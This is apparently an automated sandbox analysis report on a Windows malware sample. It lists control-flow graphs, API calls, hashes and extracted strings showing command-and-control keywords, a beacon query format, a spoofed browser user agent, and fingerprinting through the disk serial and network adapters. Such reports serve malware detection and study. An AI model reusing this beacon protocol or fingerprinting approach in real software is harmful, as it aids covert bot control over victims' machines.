2d9775a-2d97798 call 2da4a30 RtlEnterCriticalSection RtlLeaveCriticalSection 58->61 59->39 72 2d97455-2d97467 call 2da227c 59->72 61->10 70 2d977b1-2d977bf call 2d961f5 call 2d96303 66->70 71 2d977d0-2d977e2 call 2da227c 66->71 85 2d977c4-2d977cb call 2d9640e 70->85 82 2d977e8-2d977ea 71->82 83 2d97b00-2d97b12 call 2da227c 71->83 72->10 72->39 82->83 87 2d977f0-2d97807 call 2d9439c 82->87 83->10 95 2d97b18-2d97b46 call 2da2eec call 2da4a30 call 2d9439c 83->95 85->10 87->10 99 2d9780d-2d978db call 2da2358 call 2d91ba7 87->99 121 2d97b48-2d97b4a call 2d9534d 95->121 122 2d97b4f-2d97b56 call 2da2eb4 95->122 112 2d978dd call 2d9143f 99->112 113 2d978e2-2d97903 RtlEnterCriticalSection 99->113 112->113 118 2d9790f-2d97945 RtlLeaveCriticalSection call 2d93c67 call 2d93d7e 113->118 119 2d97905-2d9790c 113->119 114->115 120 2d9754e-2d97560 call 2da227c 114->120 123 2d97589-2d9758e call 2da2eec 115->123 137 2d9794a-2d97967 call 2d9826e 118->137 119->118 120->115 135 2d97562-2d97583 call 2d9439c 120->135 121->122 122->10 129 2d97593-2d975b7 call 2da4a30 call 2d9439c 123->129 144 2d975b9-2d975c8 call 2da3529 129->144 145 2d975f8-2d97601 call 2da2eb4 129->145 135->123 143 2d9796c-2d97973 137->143 146 2d97979-2d979b3 call 2d9a658 143->146 147 2d97ae7-2d97afb call 2d98f36 143->147 144->145 160 2d975ca 144->160 158 2d97738-2d9773b 145->158 159 2d97607-2d9761f call 2da3a8f 145->159 155 2d979b8-2d979c1 146->155 147->10 156 2d97ab1-2d97ae2 call 2d9831d call 2d933b2 155->156 157 2d979c7-2d979ce 155->157 156->147 161 2d979d1-2d979d6 157->161 158->48 171 2d9762b 159->171 172 2d97621-2d97629 call 2d9966a 159->172 163 2d975cf-2d975e1 call 2da2790 160->163 161->161 165 2d979d8-2d97a15 call 2d9a658 161->165 177 2d975e3 163->177 178 2d975e6-2d975f6 call 2da3529 163->178 174 2d97a1a-2d97a23 165->174 176 2d9762d-2d97661 call 2d9a782 call 2d93863 171->176 172->176 174->156 179 2d97a29-2d97a2f 174->179 189 2d97666-2d97682 call 2d95119 176->189 177->178 178->145 178->163 184 2d97a32-2d97a37 179->184 184->184 186 2d97a39-2d97a74 call 2d9a658 184->186 186->156 193 2d97a76-2d97aaa call 2d9d04a 186->193 192 2d97687-2d976b8 call 2d93863 call 2d9aa28 189->192 199 2d976bd-2d976cf call 2d9ab42 192->199 197 2d97aaf-2d97ab0 193->197 197->156 201 2d976d4-2d976e5 199->201 202 2d976ec-2d976fb Sleep 201->202 203 2d976e7 call 2d9380b 201->203 205 2d97703-2d97717 call 2da1830 202->205 203->202 207 2d97719-2d97722 call 2d94100 205->207 208 2d97723-2d97731 205->208 207->208 208->158 209 2d97733 call 2d9380b 208->209 209->158
                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(0000EA60), ref: 02D96708
                                                                                  • RtlEnterCriticalSection.NTDLL(02DC71B8), ref: 02D96713
                                                                                  • RtlLeaveCriticalSection.NTDLL(02DC71B8), ref: 02D96724
                                                                                  • InternetOpenA.WININET(?), ref: 02D972B5
                                                                                  • InternetSetOptionA.WININET(00000000,00000002,?), ref: 02D972DD
                                                                                  • InternetSetOptionA.WININET(00000000,00000005,00001388,00000004), ref: 02D972F5
                                                                                  • InternetSetOptionA.WININET(00000000,00000006,00001388,00000004), ref: 02D9730D
                                                                                  • InternetOpenUrlA.WININET(00000000,?,?,000000FF,04000200), ref: 02D97336
                                                                                  • InternetReadFile.WININET(00000000,?,00001000,?), ref: 02D97358
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 02D97378
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 02D97383
                                                                                  • RtlEnterCriticalSection.NTDLL(02DC71B8), ref: 02D973EE
                                                                                  • RtlLeaveCriticalSection.NTDLL(02DC71B8), ref: 02D973FF
                                                                                  • _malloc.LIBCMT ref: 02D97498
                                                                                  • RtlEnterCriticalSection.NTDLL(02DC71B8), ref: 02D974AA
                                                                                  • RtlLeaveCriticalSection.NTDLL(02DC71B8), ref: 02D974B6
                                                                                  • _malloc.LIBCMT ref: 02D9758E
                                                                                  • _strtok.LIBCMT ref: 02D975BF
                                                                                  • _swscanf.LIBCMT ref: 02D975D6
                                                                                  • _strtok.LIBCMT ref: 02D975ED
                                                                                  • _free.LIBCMT ref: 02D975F9
                                                                                  • Sleep.KERNEL32(000007D0), ref: 02D976F1
                                                                                  • RtlEnterCriticalSection.NTDLL(02DC71B8), ref: 02D97772
                                                                                  • RtlLeaveCriticalSection.NTDLL(02DC71B8), ref: 02D97784
                                                                                  • _sprintf.LIBCMT ref: 02D97822
                                                                                  • RtlEnterCriticalSection.NTDLL(00000020), ref: 02D978E6
                                                                                  • RtlLeaveCriticalSection.NTDLL(00000020), ref: 02D9791A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$Internet$EnterLeave$Option$CloseHandleOpenSleep_malloc_strtok$FileRead_free_sprintf_swscanf
                                                                                  • String ID: $%d;$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls$urls
                                                                                  • API String ID: 1657546717-1839899575
                                                                                  • Opcode ID: c479a46907044ce0feddfdf1106781e2be59e72f38d1ed2187360adc16bbf499
                                                                                  • Instruction ID: 7cbbf3769c8f6d2dad96e34aa400889bbd31853a3f76d53c071270eddef5b884
                                                                                  • Opcode Fuzzy Hash: c479a46907044ce0feddfdf1106781e2be59e72f38d1ed2187360adc16bbf499
                                                                                  • Instruction Fuzzy Hash: 7532E472648381DFEB25AB24D814BABB7E6EF85314F10481DF58A97391EB719C04CF62

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 213 2d9648b-2d966f1 RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress call 2d942c7 GetTickCount call 2d9605a GetVersionExA call 2da4a30 call 2da2eec * 8 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap call 2da4a30 * 3 RtlEnterCriticalSection RtlLeaveCriticalSection call 2da2eec * 4 QueryPerformanceCounter Sleep call 2da2eec * 2 call 2da4a30 * 2 258 2d966f4-2d966f6 213->258 259 2d966f8-2d966fd 258->259 260 2d966ff-2d96701 258->260 261 2d96708 Sleep 259->261 262 2d9670e-2d96742 RtlEnterCriticalSection RtlLeaveCriticalSection 260->262 263 2d96703 260->263 261->262 264 2d96792 262->264 265 2d96744-2d96750 262->265 263->261 267 2d96796-2d972c3 InternetOpenA 264->267 265->264 266 2d96752-2d9675f 265->266 268 2d96761-2d96765 266->268 269 2d96767-2d96768 266->269 272 2d97389-2d9738f 267->272 273 2d972c9-2d97340 InternetSetOptionA * 3 call 2da4a30 InternetOpenUrlA 267->273 271 2d9676c-2d96790 call 2da4a30 * 2 268->271 269->271 271->267 275 2d973ab-2d973b9 272->275 276 2d97391-2d97397 272->276 283 2d97382-2d97383 InternetCloseHandle 273->283 284 2d97342 273->284 275->258 282 2d973bf-2d973e3 call 2da4a30 call 2d9439c 275->282 279 2d97399-2d9739b 276->279 280 2d9739d-2d973aa call 2d953ec 276->280 279->275 280->275 282->258 296 2d973e9-2d97417 RtlEnterCriticalSection RtlLeaveCriticalSection call 2da227c 282->296 283->272 289 2d97346-2d9736c InternetReadFile 284->289 293 2d9736e-2d97375 289->293 294 2d97377-2d9737e InternetCloseHandle 289->294 293->289 294->283 299 2d97419-2d9742b call 2da227c 296->299 300 2d9746d-2d97488 call 2da227c 296->300 299->300 307 2d9742d-2d9743f call 2da227c 299->307 305 2d9748e-2d97490 300->305 306 2d97742-2d97754 call 2da227c 300->306 305->306 308 2d97496-2d97548 call 2da2eec RtlEnterCriticalSection RtlLeaveCriticalSection call 2da4a30 * 5 call 2d9439c * 2 305->308 315 2d9779d-2d977af call 2da227c 306->315 316 2d97756-2d97758 306->316 307->300 317 2d97441-2d97453 call 2da227c 307->317 372 2d9754a-2d9754c 308->372 373 2d97585 308->373 328 2d977b1-2d977bf call 2d961f5 call 2d96303 315->328 329 2d977d0-2d977e2 call 2da227c 315->329 316->315 319 2d9775a-2d97798 call 2da4a30 RtlEnterCriticalSection RtlLeaveCriticalSection 316->319 317->300 330 2d97455-2d97467 call 2da227c 317->330 319->258 343 2d977c4-2d977cb call 2d9640e 328->343 340 2d977e8-2d977ea 329->340 341 2d97b00-2d97b12 call 2da227c 329->341 330->258 330->300 340->341 345 2d977f0-2d97807 call 2d9439c 340->345 341->258 353 2d97b18-2d97b46 call 2da2eec call 2da4a30 call 2d9439c 341->353 343->258 345->258 357 2d9780d-2d978db call 2da2358 call 2d91ba7 345->357 379 2d97b48-2d97b4a call 2d9534d 353->379 380 2d97b4f-2d97b56 call 2da2eb4 353->380 370 2d978dd call 2d9143f 357->370 371 2d978e2-2d97903 RtlEnterCriticalSection 357->371 370->371 376 2d9790f-2d97973 RtlLeaveCriticalSection call 2d93c67 call 2d93d7e call 2d9826e 371->376 377 2d97905-2d9790c 371->377 372->373 378 2d9754e-2d97560 call 2da227c 372->378 381 2d97589-2d975b7 call 2da2eec call 2da4a30 call 2d9439c 373->381 404 2d97979-2d979c1 call 2d9a658 376->404 405 2d97ae7-2d97afb call 2d98f36 376->405 377->376 378->373 393 2d97562-2d97583 call 2d9439c 378->393 379->380 380->258 402 2d975b9-2d975c8 call 2da3529 381->402 403 2d975f8-2d97601 call 2da2eb4 381->403 393->381 402->403 418 2d975ca 402->418 416 2d97738-2d9773b 403->416 417 2d97607-2d9761f call 2da3a8f 403->417 414 2d97ab1-2d97ae2 call 2d9831d call 2d933b2 404->414 415 2d979c7-2d979ce 404->415 405->258 414->405 419 2d979d1-2d979d6 415->419 416->306 429 2d9762b 417->429 430 2d97621-2d97629 call 2d9966a 417->430 421 2d975cf-2d975e1 call 2da2790 418->421 419->419 423 2d979d8-2d97a23 call 2d9a658 419->423 435 2d975e3 421->435 436 2d975e6-2d975f6 call 2da3529 421->436 423->414 437 2d97a29-2d97a2f 423->437 434 2d9762d-2d976cf call 2d9a782 call 2d93863 call 2d95119 call 2d93863 call 2d9aa28 call 2d9ab42 429->434 430->434 459 2d976d4-2d976e5 434->459 435->436 436->403 436->421 442 2d97a32-2d97a37 437->442 442->442 444 2d97a39-2d97a74 call 2d9a658 442->444 444->414 451 2d97a76-2d97aaa call 2d9d04a 444->451 455 2d97aaf-2d97ab0 451->455 455->414 460 2d976ec-2d97717 Sleep call 2da1830 459->460 461 2d976e7 call 2d9380b 459->461 465 2d97719-2d97722 call 2d94100 460->465 466 2d97723-2d97731 460->466 461->460 465->466 466->416 467 2d97733 call 2d9380b 466->467 467->416
                                                                                  APIs
                                                                                  • RtlInitializeCriticalSection.NTDLL(02DC71B8), ref: 02D964BA
                                                                                  • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02D964D1
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D964DA
                                                                                  • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02D964E9
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D964EC
                                                                                  • GetTickCount.KERNEL32 ref: 02D964F8
                                                                                    • Part of subcall function 02D9605A: _malloc.LIBCMT ref: 02D96068
                                                                                  • GetVersionExA.KERNEL32(02DC7010), ref: 02D96525
                                                                                  • _malloc.LIBCMT ref: 02D96551
                                                                                    • Part of subcall function 02DA2EEC: __FF_MSGBANNER.LIBCMT ref: 02DA2F03
                                                                                    • Part of subcall function 02DA2EEC: __NMSG_WRITE.LIBCMT ref: 02DA2F0A
                                                                                    • Part of subcall function 02DA2EEC: RtlAllocateHeap.NTDLL(00A70000,00000000,00000001), ref: 02DA2F2F
                                                                                  • _malloc.LIBCMT ref: 02D96561
                                                                                  • _malloc.LIBCMT ref: 02D9656C
                                                                                  • _malloc.LIBCMT ref: 02D96577
                                                                                  • _malloc.LIBCMT ref: 02D96582
                                                                                  • _malloc.LIBCMT ref: 02D9658D
                                                                                  • _malloc.LIBCMT ref: 02D96598
                                                                                  • _malloc.LIBCMT ref: 02D965A7
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02D965BE
                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 02D965C7
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D965D6
                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 02D965D9
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D965E4
                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 02D965E7
                                                                                  • RtlEnterCriticalSection.NTDLL(02DC71B8), ref: 02D96621
                                                                                  • RtlLeaveCriticalSection.NTDLL(02DC71B8), ref: 02D9662E
                                                                                  • _malloc.LIBCMT ref: 02D96652
                                                                                  • _malloc.LIBCMT ref: 02D96660
                                                                                  • _malloc.LIBCMT ref: 02D96667
                                                                                  • _malloc.LIBCMT ref: 02D9668D
                                                                                  • QueryPerformanceCounter.KERNEL32(00000200), ref: 02D966A0
                                                                                  • Sleep.KERNELBASE ref: 02D966AE
                                                                                  • _malloc.LIBCMT ref: 02D966BA
                                                                                  • _malloc.LIBCMT ref: 02D966C7
                                                                                  • Sleep.KERNELBASE(0000EA60), ref: 02D96708
                                                                                  • RtlEnterCriticalSection.NTDLL(02DC71B8), ref: 02D96713
                                                                                  • RtlLeaveCriticalSection.NTDLL(02DC71B8), ref: 02D96724
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _malloc$Heap$CriticalSection$Allocate$Process$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
                                                                                  • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$sprintf$strcat
                                                                                  • API String ID: 4273019447-2678694477
                                                                                  • Opcode ID: 498d6bc841409976fc7dbcfd0d0276888369b80cced6cb3bce555dfd498d9f4e
                                                                                  • Instruction ID: 09125435d51d4399fa618ff3d57d1869c75296e24d309cbcdd4174812e6fab4e
                                                                                  • Opcode Fuzzy Hash: 498d6bc841409976fc7dbcfd0d0276888369b80cced6cb3bce555dfd498d9f4e
                                                                                  • Instruction Fuzzy Hash: 227171B1D48340EBE311AF759C59B5BBBE9EF85710F20081AF98597380DAB49D40CFA6

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 572 401b4b-401b68 LoadLibraryA 573 401c21-401c25 572->573 574 401b6e-401b7f GetProcAddress 572->574 575 401b85-401b8e 574->575 576 401c18-401c1b FreeLibrary 574->576 577 401b95-401ba5 GetAdaptersInfo 575->577 576->573 578 401ba7-401bb0 577->578 579 401bdb-401be3 577->579 582 401bc1-401bd7 call 402bc0 call 4018cc 578->582 583 401bb2-401bb6 578->583 580 401be5-401beb call 402ba6 579->580 581 401bec-401bf0 579->581 580->581 585 401bf2-401bf6 581->585 586 401c15-401c17 581->586 582->579 583->579 587 401bb8-401bbf 583->587 585->586 590 401bf8-401bfb 585->590 586->576 587->582 587->583 592 401c06-401c13 call 402b98 590->592 593 401bfd-401c03 590->593 592->577 592->586 593->592
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 00401B5D
                                                                                  • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B74
                                                                                  • GetAdaptersInfo.IPHLPAPI(?,00000400), ref: 00401B9D
                                                                                  • FreeLibrary.KERNEL32(00401A3E), ref: 00401C1B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2984540971.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.2984540971.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_txttosub32_64.jbxd
                                                                                  Similarity
                                                                                  • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                  • String ID: GetAdaptersInfo$iphlpapi.dll$o
                                                                                  • API String ID: 514930453-3667123677
                                                                                  • Opcode ID: 4786119c2dd8152e4b47b2a924d6ecb004799f19bdb0843ab8028876a5fcac46
                                                                                  • Instruction ID: 9300e3b8f0653b0f10764aaa79a1f2494f67c894d04353eb45b18fdb2f867aae
                                                                                  • Opcode Fuzzy Hash: 4786119c2dd8152e4b47b2a924d6ecb004799f19bdb0843ab8028876a5fcac46
                                                                                  • Instruction Fuzzy Hash: 9621B870944109AFEF11DF65C944BEF7BB8EF41344F1440BAE504B22E1E778A985CB69

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 646 2d9f8da-2d9f8fd LoadLibraryA 647 2d9f9bd-2d9f9c4 646->647 648 2d9f903-2d9f911 GetProcAddress 646->648 649 2d9f917-2d9f927 648->649 650 2d9f9b6-2d9f9b7 FreeLibrary 648->650 651 2d9f929-2d9f935 GetAdaptersInfo 649->651 650->647 652 2d9f96d-2d9f975 651->652 653 2d9f937 651->653 654 2d9f97e-2d9f983 652->654 655 2d9f977-2d9f97d call 2da36eb 652->655 656 2d9f939-2d9f940 653->656 658 2d9f9b1-2d9f9b5 654->658 659 2d9f985-2d9f988 654->659 655->654 660 2d9f94a-2d9f952 656->660 661 2d9f942-2d9f946 656->661 658->650 659->658 663 2d9f98a-2d9f98f 659->663 665 2d9f955-2d9f95a 660->665 661->656 664 2d9f948 661->664 666 2d9f99c-2d9f9a7 call 2da3a8f 663->666 667 2d9f991-2d9f999 663->667 664->652 665->665 668 2d9f95c-2d9f969 call 2d9f629 665->668 666->658 673 2d9f9a9-2d9f9ac 666->673 667->666 668->652 673->651
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 02D9F8F0
                                                                                  • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02D9F909
                                                                                  • GetAdaptersInfo.IPHLPAPI(?,?), ref: 02D9F92E
                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 02D9F9B7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                  • String ID: GetAdaptersInfo$iphlpapi.dll
                                                                                  • API String ID: 514930453-3114217049
                                                                                  • Opcode ID: 80ae5213bb0c050e5e672d096077381a29741d61fa34a75f001a8b28bf15139d
                                                                                  • Instruction ID: 9219f2d2596a61f6da99e321dd05c7fe16d8e265fb8c99eb3faaf2e0f2c1849d
                                                                                  • Opcode Fuzzy Hash: 80ae5213bb0c050e5e672d096077381a29741d61fa34a75f001a8b28bf15139d
                                                                                  • Instruction Fuzzy Hash: 8A219E32E04209BFEF11DBA8D890AEEBBB9AF05314F1440AAE945E7741D7309D45CBA0

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 731 2d9f7d6-2d9f801 CreateFileA 732 2d9f8d2-2d9f8d9 731->732 733 2d9f807-2d9f81c 731->733 734 2d9f81f-2d9f841 DeviceIoControl 733->734 735 2d9f87a-2d9f882 734->735 736 2d9f843-2d9f84b 734->736 737 2d9f88b-2d9f88d 735->737 738 2d9f884-2d9f88a call 2da36eb 735->738 739 2d9f84d-2d9f852 736->739 740 2d9f854-2d9f859 736->740 742 2d9f8c8-2d9f8d1 CloseHandle 737->742 743 2d9f88f-2d9f892 737->743 738->737 739->735 740->735 744 2d9f85b-2d9f863 740->744 742->732 746 2d9f8ae-2d9f8bb call 2da3a8f 743->746 747 2d9f894-2d9f89d GetLastError 743->747 748 2d9f866-2d9f86b 744->748 746->742 755 2d9f8bd-2d9f8c3 746->755 747->742 749 2d9f89f-2d9f8a2 747->749 748->748 751 2d9f86d-2d9f879 call 2d9f629 748->751 749->746 752 2d9f8a4-2d9f8ab 749->752 751->735 752->746 755->734
                                                                                  APIs
                                                                                  • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 02D9F7F5
                                                                                  • DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 02D9F833
                                                                                  • GetLastError.KERNEL32 ref: 02D9F894
                                                                                  • CloseHandle.KERNELBASE(?), ref: 02D9F8CB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                                  • String ID: \\.\PhysicalDrive0
                                                                                  • API String ID: 4026078076-1180397377
                                                                                  • Opcode ID: 7b0fd54f987dde08d7f54178c8080f7ce587989481d094d660b537b1cfe1f03d
                                                                                  • Instruction ID: aca0bb272e4a22f14cffd4f38318458fb5b2bda7db3e6cddd6f89f62f952c00c
                                                                                  • Opcode Fuzzy Hash: 7b0fd54f987dde08d7f54178c8080f7ce587989481d094d660b537b1cfe1f03d
                                                                                  • Instruction Fuzzy Hash: C7319CB2D00219EFDF14DF95D894BAEBBB9EB45714F20416AF505A3780C7709E05CBA0

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 757 401a4f-401a77 CreateFileA 758 401b45-401b4a 757->758 759 401a7d-401a91 757->759 760 401a98-401ac0 DeviceIoControl 759->760 761 401ac2-401aca 760->761 762 401af3-401afb 760->762 763 401ad4-401ad9 761->763 764 401acc-401ad2 761->764 765 401b04-401b07 762->765 766 401afd-401b03 call 402ba6 762->766 763->762 767 401adb-401af1 call 402bc0 call 4018cc 763->767 764->762 769 401b09-401b0c 765->769 770 401b3a-401b44 CloseHandle 765->770 766->765 767->762 773 401b27-401b34 call 402b98 769->773 774 401b0e-401b17 GetLastError 769->774 770->758 773->760 773->770 774->770 775 401b19-401b1c 774->775 775->773 778 401b1e-401b24 775->778 778->773
                                                                                  APIs
                                                                                  • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 00401A6B
                                                                                  • DeviceIoControl.KERNELBASE(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401AB2
                                                                                  • GetLastError.KERNEL32 ref: 00401B0E
                                                                                  • CloseHandle.KERNELBASE(?), ref: 00401B3D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2984540971.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.2984540971.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_txttosub32_64.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                                  • String ID: \\.\PhysicalDrive0
                                                                                  • API String ID: 4026078076-1180397377
                                                                                  • Opcode ID: a2e68a95d94bbc6a40bee8a11280b17da373fae52957672b226b91710cefcd17
                                                                                  • Instruction ID: c07866d4b4e887281577b2397114bebd63d98cfae9bba907e2345ee80fd6f57b
                                                                                  • Opcode Fuzzy Hash: a2e68a95d94bbc6a40bee8a11280b17da373fae52957672b226b91710cefcd17
                                                                                  • Instruction Fuzzy Hash: 00316D71D01118EACB21EFA5CD849EFBBB9FF41750F20417AE515B22A0E3786E45CB98

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02D91D11
                                                                                  • GetLastError.KERNEL32 ref: 02D91D23
                                                                                    • Part of subcall function 02D91712: __EH_prolog.LIBCMT ref: 02D91717
                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02D91D59
                                                                                  • GetLastError.KERNEL32 ref: 02D91D6B
                                                                                  • __beginthreadex.LIBCMT ref: 02D91DB1
                                                                                  • GetLastError.KERNEL32 ref: 02D91DC6
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 02D91DDD
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 02D91DEC
                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D91E14
                                                                                  • CloseHandle.KERNELBASE(00000000), ref: 02D91E1B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait__beginthreadex
                                                                                  • String ID: thread$thread.entry_event$thread.exit_event
                                                                                  • API String ID: 831262434-3017686385
                                                                                  • Opcode ID: 6df1ccab95d21939a01e67d5fdaad42e3585f8b16c9b46f17cf883f112b82c02
                                                                                  • Instruction ID: 50a80edbf1ce3e1a6ba437356be2e6a65b05d1610778e95a3995928fc1ffad63
                                                                                  • Opcode Fuzzy Hash: 6df1ccab95d21939a01e67d5fdaad42e3585f8b16c9b46f17cf883f112b82c02
                                                                                  • Instruction Fuzzy Hash: 0B316C71A04302DFEB01EF24C858B2BBBA5FB84714F10496AF95997390DB70DC49CBA2

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D94D8B
                                                                                  • RtlEnterCriticalSection.NTDLL(02DC71B8), ref: 02D94DB7
                                                                                  • RtlLeaveCriticalSection.NTDLL(02DC71B8), ref: 02D94DC3
                                                                                    • Part of subcall function 02D94BED: __EH_prolog.LIBCMT ref: 02D94BF2
                                                                                    • Part of subcall function 02D94BED: InterlockedExchange.KERNEL32(?,00000000), ref: 02D94CF2
                                                                                  • RtlEnterCriticalSection.NTDLL(02DC71B8), ref: 02D94E93
                                                                                  • RtlLeaveCriticalSection.NTDLL(02DC71B8), ref: 02D94E99
                                                                                  • RtlEnterCriticalSection.NTDLL(02DC71B8), ref: 02D94EA0
                                                                                  • RtlLeaveCriticalSection.NTDLL(02DC71B8), ref: 02D94EA6
                                                                                  • RtlEnterCriticalSection.NTDLL(02DC71B8), ref: 02D950A7
                                                                                  • RtlLeaveCriticalSection.NTDLL(02DC71B8), ref: 02D950AD
                                                                                  • RtlEnterCriticalSection.NTDLL(02DC71B8), ref: 02D950B8
                                                                                  • RtlLeaveCriticalSection.NTDLL(02DC71B8), ref: 02D950C1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                                                  • String ID:
                                                                                  • API String ID: 2062355503-0
                                                                                  • Opcode ID: 58f6aa6da33026f8db30c2762c1cb4358c08f000a7ac02dd71183c9f8c00c217
                                                                                  • Instruction ID: 879e35197ccd2ea4321400bd8d6ec18208c244c5204b10ab4bc091fa40065c91
                                                                                  • Opcode Fuzzy Hash: 58f6aa6da33026f8db30c2762c1cb4358c08f000a7ac02dd71183c9f8c00c217
                                                                                  • Instruction Fuzzy Hash: 46B12871D04259DFEF21DF90D844BEEBBB9EF05314F24405AE809A6381DB745A49CFA1

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
